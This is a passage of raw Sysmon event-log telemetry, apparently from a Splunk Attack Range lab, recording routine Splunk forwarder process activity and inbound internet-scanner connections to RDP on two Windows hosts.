15:00:02.652{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.652{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.652{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.652{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC72-607E-700F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.652{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC72-607E-700F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.653{A7A01FEF-EC72-607E-700F-00000000BB01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.589{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61879E2A01FC111A88823D05225C8E86,SHA256=36430F24704A049C0EF1468E2CE6C24D389887F9474FF6EBD1CCC9F8F287C0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.292{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A0B38C68D42B62C6C9B270AC13C3570,SHA256=56FDE6B74B60EDD3FE3F743AA67A54D85DBD4C0C5319949E2E28D975A660EA4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:00.628{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63943-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000082230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC71-607E-6F0F-00000000BB01}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:01.996{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC71-607E-6F0F-00000000BB01}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x800000000000000050977Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:02.870{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=036E50EF773F91B73E6940AC9E10624B,SHA256=8F15B70DDE91A957AC63385116727B3F3FEEC1245DC885A0E26BB2EED68A9490,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050976Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:02.667{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27F8E2360EFC5ED3D6562AB37BAE5DFF,SHA256=13C03A93158BF83A336ED8104C186EED6DF455EEF7C8777E784269F09C5B7776,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050975Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:59.773{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52557-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050974Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:59.405{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49853-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.667{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D21BB96DF0415FD81AF47D8F1289B657,SHA256=411562EACF24799B4D343C5E325C2F8241EECA2A74F2D9F1855FC2333656C1CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.480{A7A01FEF-EC73-607E-710F-00000000BB01}48886444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC73-607E-710F-00000000BB01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC73-607E-710F-00000000BB01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC73-607E-710F-00000000BB01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.324{A7A01FEF-EC73-607E-710F-00000000BB01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:03.308{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AEB71095173E6510A730153A62BA7BC,SHA256=C7C77C86256E04220122056365890AE9334E9429D4EE3D5EEC629B86B55EA168,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050979Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:03.870{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B59F734FBDF3BE0F13BB2CCA10913608,SHA256=8BEBA89C56DF40280D2746D3250932F9B9215C523757E33FA379CB9C6C6FB086,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050978Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:00.139{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54866-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000082274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.980{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC74-607E-730F-00000000BB01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.980{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 